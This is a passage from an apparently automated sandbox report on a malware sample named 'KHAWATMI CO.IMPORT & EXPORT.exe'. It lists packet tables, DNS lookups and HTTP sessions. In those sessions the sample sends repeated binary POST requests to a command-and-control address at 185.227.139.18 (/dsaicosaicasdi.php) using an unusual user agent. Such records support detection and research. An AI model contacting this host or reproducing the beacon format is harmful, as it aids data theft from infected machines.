            Aug 3, 2021 08:12:27.484879971 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.484932899 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.484957933 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485121012 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.485558033 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485590935 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485613108 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485644102 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485672951 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.485712051 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.485745907 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.485831022 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.486145020 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.486296892 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.486567974 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.486604929 CEST8049753185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.486675024 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.499150991 CEST4975380192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.841173887 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.983741999 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:27.983902931 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:27.995006084 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.137423038 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.138072014 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.280507088 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.866781950 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.866821051 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.866832018 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.867017031 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.867089987 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.867142916 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.867163897 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.867290020 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.868438005 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.868715048 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.868745089 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.868757963 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.868798971 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.868832111 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.868849039 CEST8049754185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:28.869251966 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.869268894 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.869271994 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.869273901 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:28.869276047 CEST4975480192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:29.057308912 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:29.199930906 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:29.200562000 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:29.223743916 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:29.366354942 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:29.366456985 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:29.508951902 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140487909 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140530109 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140542984 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140723944 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.140746117 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140779972 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140794992 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.140938044 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.141019106 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.141048908 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.141063929 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.141130924 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.141268969 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.141295910 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.141438961 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.142525911 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.158453941 CEST8049755185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.159250975 CEST4975580192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.481532097 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.624118090 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.624241114 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.628950119 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.771459103 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:30.783184052 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:30.925868988 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.508862972 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.508893013 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.508903027 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509040117 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:31.509071112 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509094954 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509108067 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509177923 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:31.509356976 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509377003 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509387970 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509448051 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:31.509663105 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509704113 CEST8049756185.227.139.18192.168.2.3
            Aug 3, 2021 08:12:31.509771109 CEST4975680192.168.2.3185.227.139.18
            Aug 3, 2021 08:12:31.510674953 CEST8049756185.227.139.18192.168.2.3

            UDP Packets

            TimestampSource PortDest PortSource IPDest IP
            Aug 3, 2021 08:06:02.561711073 CEST6418553192.168.2.38.8.8.8
            Aug 3, 2021 08:06:02.587394953 CEST53641858.8.8.8192.168.2.3
            Aug 3, 2021 08:06:03.523422003 CEST6511053192.168.2.38.8.8.8
            Aug 3, 2021 08:06:03.549778938 CEST53651108.8.8.8192.168.2.3
            Aug 3, 2021 08:06:04.874326944 CEST5836153192.168.2.38.8.8.8
            Aug 3, 2021 08:06:04.906574965 CEST53583618.8.8.8192.168.2.3
            Aug 3, 2021 08:06:07.017973900 CEST6349253192.168.2.38.8.8.8
            Aug 3, 2021 08:06:07.053630114 CEST53634928.8.8.8192.168.2.3
            Aug 3, 2021 08:06:08.382019043 CEST6083153192.168.2.38.8.8.8
            Aug 3, 2021 08:06:08.416337013 CEST53608318.8.8.8192.168.2.3
            Aug 3, 2021 08:06:10.325537920 CEST6010053192.168.2.38.8.8.8
            Aug 3, 2021 08:06:10.350493908 CEST53601008.8.8.8192.168.2.3
            Aug 3, 2021 08:06:15.376889944 CEST5319553192.168.2.38.8.8.8
            Aug 3, 2021 08:06:15.402035952 CEST53531958.8.8.8192.168.2.3
            Aug 3, 2021 08:06:17.162555933 CEST5014153192.168.2.38.8.8.8
            Aug 3, 2021 08:06:17.190224886 CEST53501418.8.8.8192.168.2.3
            Aug 3, 2021 08:06:27.280474901 CEST5302353192.168.2.38.8.8.8
            Aug 3, 2021 08:06:27.307948112 CEST53530238.8.8.8192.168.2.3
            Aug 3, 2021 08:06:29.274162054 CEST4956353192.168.2.38.8.8.8
            Aug 3, 2021 08:06:29.309591055 CEST53495638.8.8.8192.168.2.3
            Aug 3, 2021 08:06:30.392318964 CEST5135253192.168.2.38.8.8.8
            Aug 3, 2021 08:06:30.428770065 CEST53513528.8.8.8192.168.2.3
            Aug 3, 2021 08:06:31.567733049 CEST5934953192.168.2.38.8.8.8
            Aug 3, 2021 08:06:31.604064941 CEST53593498.8.8.8192.168.2.3
            Aug 3, 2021 08:06:32.395380974 CEST5708453192.168.2.38.8.8.8
            Aug 3, 2021 08:06:32.421241045 CEST53570848.8.8.8192.168.2.3
            Aug 3, 2021 08:06:34.095387936 CEST5882353192.168.2.38.8.8.8
            Aug 3, 2021 08:06:34.122996092 CEST53588238.8.8.8192.168.2.3
            Aug 3, 2021 08:06:35.255598068 CEST5756853192.168.2.38.8.8.8
            Aug 3, 2021 08:06:35.293929100 CEST53575688.8.8.8192.168.2.3
            Aug 3, 2021 08:06:36.004561901 CEST5054053192.168.2.38.8.8.8
            Aug 3, 2021 08:06:36.054364920 CEST53505408.8.8.8192.168.2.3
            Aug 3, 2021 08:06:36.325654984 CEST5436653192.168.2.38.8.8.8
            Aug 3, 2021 08:06:36.350203037 CEST53543668.8.8.8192.168.2.3
            Aug 3, 2021 08:06:38.112377882 CEST5303453192.168.2.38.8.8.8
            Aug 3, 2021 08:06:38.144728899 CEST53530348.8.8.8192.168.2.3
            Aug 3, 2021 08:07:06.873698950 CEST5776253192.168.2.38.8.8.8
            Aug 3, 2021 08:07:06.909287930 CEST53577628.8.8.8192.168.2.3
            Aug 3, 2021 08:07:07.608310938 CEST5543553192.168.2.38.8.8.8
            Aug 3, 2021 08:07:07.643776894 CEST53554358.8.8.8192.168.2.3
            Aug 3, 2021 08:07:08.167875051 CEST5071353192.168.2.38.8.8.8
            Aug 3, 2021 08:07:08.203213930 CEST53507138.8.8.8192.168.2.3
            Aug 3, 2021 08:07:08.591665983 CEST5613253192.168.2.38.8.8.8
            Aug 3, 2021 08:07:08.626812935 CEST53561328.8.8.8192.168.2.3
            Aug 3, 2021 08:07:09.066729069 CEST5898753192.168.2.38.8.8.8
            Aug 3, 2021 08:07:09.099097013 CEST53589878.8.8.8192.168.2.3
            Aug 3, 2021 08:07:09.610244036 CEST5657953192.168.2.38.8.8.8
            Aug 3, 2021 08:07:09.635169983 CEST53565798.8.8.8192.168.2.3
            Aug 3, 2021 08:07:10.153930902 CEST6063353192.168.2.38.8.8.8
            Aug 3, 2021 08:07:10.186781883 CEST53606338.8.8.8192.168.2.3
            Aug 3, 2021 08:07:10.913202047 CEST6129253192.168.2.38.8.8.8
            Aug 3, 2021 08:07:10.938419104 CEST53612928.8.8.8192.168.2.3
            Aug 3, 2021 08:07:12.204030991 CEST6361953192.168.2.38.8.8.8
            Aug 3, 2021 08:07:12.239463091 CEST53636198.8.8.8192.168.2.3
            Aug 3, 2021 08:07:12.693355083 CEST6493853192.168.2.38.8.8.8
            Aug 3, 2021 08:07:12.727677107 CEST53649388.8.8.8192.168.2.3
            Aug 3, 2021 08:07:13.902677059 CEST6194653192.168.2.38.8.8.8
            Aug 3, 2021 08:07:13.944535971 CEST53619468.8.8.8192.168.2.3
            Aug 3, 2021 08:07:22.200280905 CEST6491053192.168.2.38.8.8.8
            Aug 3, 2021 08:07:22.240190029 CEST53649108.8.8.8192.168.2.3
            Aug 3, 2021 08:07:41.223428011 CEST5212353192.168.2.38.8.8.8
            Aug 3, 2021 08:07:41.272118092 CEST53521238.8.8.8192.168.2.3
            Aug 3, 2021 08:10:57.579036951 CEST5613053192.168.2.38.8.8.8
            Aug 3, 2021 08:10:57.614332914 CEST53561308.8.8.8192.168.2.3
            Aug 3, 2021 08:10:58.213329077 CEST5633853192.168.2.38.8.8.8
            Aug 3, 2021 08:10:58.247992992 CEST53563388.8.8.8192.168.2.3
            Aug 3, 2021 08:11:06.469744921 CEST5942053192.168.2.38.8.8.8
            Aug 3, 2021 08:11:06.503454924 CEST53594208.8.8.8192.168.2.3
            Aug 3, 2021 08:11:10.841893911 CEST5878453192.168.2.38.8.8.8
            Aug 3, 2021 08:11:10.874582052 CEST53587848.8.8.8192.168.2.3
            Aug 3, 2021 08:11:11.153975010 CEST6397853192.168.2.38.8.8.8
            Aug 3, 2021 08:11:11.178591967 CEST53639788.8.8.8192.168.2.3
            Aug 3, 2021 08:12:22.548403978 CEST6293853192.168.2.38.8.8.8
            Aug 3, 2021 08:12:22.608761072 CEST53629388.8.8.8192.168.2.3
            Aug 3, 2021 08:12:23.496463060 CEST5570853192.168.2.38.8.8.8
            Aug 3, 2021 08:12:23.536290884 CEST53557088.8.8.8192.168.2.3
            Aug 3, 2021 08:13:14.448586941 CEST5680353192.168.2.38.8.8.8
            Aug 3, 2021 08:13:14.495676994 CEST53568038.8.8.8192.168.2.3

            DNS Queries

            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
            Aug 3, 2021 08:12:22.548403978 CEST192.168.2.38.8.8.80xb178Standard query (0)onedrive.live.comA (IP address)IN (0x0001)
            Aug 3, 2021 08:12:23.496463060 CEST192.168.2.38.8.8.80xf31dStandard query (0)mbdetq.dm.files.1drv.comA (IP address)IN (0x0001)

            DNS Answers

            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
            Aug 3, 2021 08:10:57.614332914 CEST8.8.8.8192.168.2.30xf08cNo error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
            Aug 3, 2021 08:12:22.608761072 CEST8.8.8.8192.168.2.30xb178No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)
            Aug 3, 2021 08:12:23.536290884 CEST8.8.8.8192.168.2.30xf31dNo error (0)mbdetq.dm.files.1drv.comdm-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)
            Aug 3, 2021 08:12:23.536290884 CEST8.8.8.8192.168.2.30xf31dNo error (0)dm-files.fe.1drv.comodc-dm-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)

            HTTP Request Dependency Graph

            • 185.227.139.18

            HTTP Packets

            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.349753185.227.139.1880C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            TimestampkBytes transferredDirectionData
            Aug 3, 2021 08:12:26.643964052 CEST5872OUTPOST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 190
            Connection: close
            Aug 3, 2021 08:12:27.484879971 CEST5874INHTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:26 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session IDSource IPSource PortDestination IPDestination PortProcess
            1192.168.2.349754185.227.139.1880C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            TimestampkBytes transferredDirectionData
            Aug 3, 2021 08:12:27.995006084 CEST5884OUTPOST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
            Content-Key: 976E9D7A
            Content-Length: 190
            Connection: close
            Aug 3, 2021 08:12:28.866781950 CEST5886INHTTP/1.1 404 Not Found
            Date: Tue, 03 Aug 2021 06:12:28 GMT
            Server: Apache
            Connection: close
            Content-Type: text/html; charset=UTF-8
            Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
            Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {


            Session IDSource IPSource PortDestination IPDestination PortProcess
            2192.168.2.349755185.227.139.1880C:\Users\user\Desktop\KHAWATMI CO.IMPORT & EXPORT.exe
            TimestampkBytes transferredDirectionData
            Aug 3, 2021 08:12:29.223743916 CEST5896OUTPOST /dsaicosaicasdi.php/a1NQk98eWCWX2 HTTP/1.0
            User-Agent: Mozilla/4.08 (Charon; Inferno)
            Host: 185.227.139.18
            Accept: */*
            Content-Type: application/octet-stream
            Content-Encoding: binary
